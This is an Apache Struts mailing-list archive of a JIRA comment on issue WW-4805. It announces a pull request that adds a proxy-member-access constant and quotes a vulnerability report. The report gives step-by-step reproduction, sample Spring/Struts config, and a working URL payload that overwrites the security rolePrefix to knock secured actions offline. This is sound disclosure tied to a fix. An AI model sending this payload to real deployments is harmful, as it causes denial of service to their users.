You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@struts.apache.org by "ASF GitHub Bot (JIRA)" <ji...@apache.org> on 2017/07/07 09:12:00 UTC

[jira] [Commented] (WW-4805) At least a DoS attack is available for Spring secured actions

    [ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16077846#comment-16077846 ] 

ASF GitHub Bot commented on WW-4805:
------------------------------------

GitHub user yasserzamani opened a pull request:

    https://github.com/apache/struts/pull/147

    WW-4805: Adds constant to control proxy member access (support-2-3)

    Ports #146 to branch support-2-3.

You can merge this pull request into a Git repository by running:

    $ git pull https://github.com/yasserzamani/struts support-2-3_WW-4805_2

Alternatively you can review and apply these changes as the patch at:

    https://github.com/apache/struts/pull/147.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

    This closes #147
    
----
commit 086b63735527d4bb0c1dd0d86a7c0374b825ff24
Author: Yasser Zamani <ya...@live.com>
Date:   2017-07-07T09:05:10Z

    Adds constant to control proxy member access

----


> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
>                 Key: WW-4805
>                 URL: https://issues.apache.org/jira/browse/WW-4805
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core, Plugin - Spring
>    Affects Versions: 2.3.32, 2.5.10
>            Reporter: Yasser Zamani
>              Labels: github-import, patch, security
>             Fix For: 2.3.33, 2.5.12
>
>
> This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned at section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
> Attack Steps:
> # An anonymous user logins as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
>  where {action0-actionN} are actions available for users
> Attack Impacts:
> By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles even if they authenticate via login! so services are down and webapp restart is required to back to normal!!!
> Configuration Example:
> * spring-security.xml
> {code:xml}
>     <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
>     <http auto-config="true" use-expressions="false">
>         <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
>     </http>
>     <authentication-manager erase-credentials="false">
>         <authentication-provider>
>             <user-service>
>                 <user name="admin" password="admin" authorities="ROLE_ADMIN" />
>                 <user name="user" password="user" authorities="ROLE_USER" />
>             </user-service>
>         </authentication-provider>
>     </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
>         <action name="admin" class="secureAction" method="admin">
>             <result name="success" type="json" />
>         </action>
>         <action name="user" class="secureAction" method="user">
>             <result name="success" type="json" />
>         </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
> import org.springframework.security.access.annotation.Secured;
> public class SecureAction {
>     @Secured({"ROLE_ADMIN"})
>     public String admin() {
>         return "success";
>     }
>     @Secured({"ROLE_USER"})
>     public String user() {
>         return "success";
>     }
> }
> {code}
> * login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as user.
> * open 
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as admin.
> * try to access 
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
>  which fails!
> * also repeat 5 and try open
> {noformat}
>  http://{ip}:{port}/user
> {noformat}
>  which also fails!
> * Services are down and webapp restart is required to back to normal.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)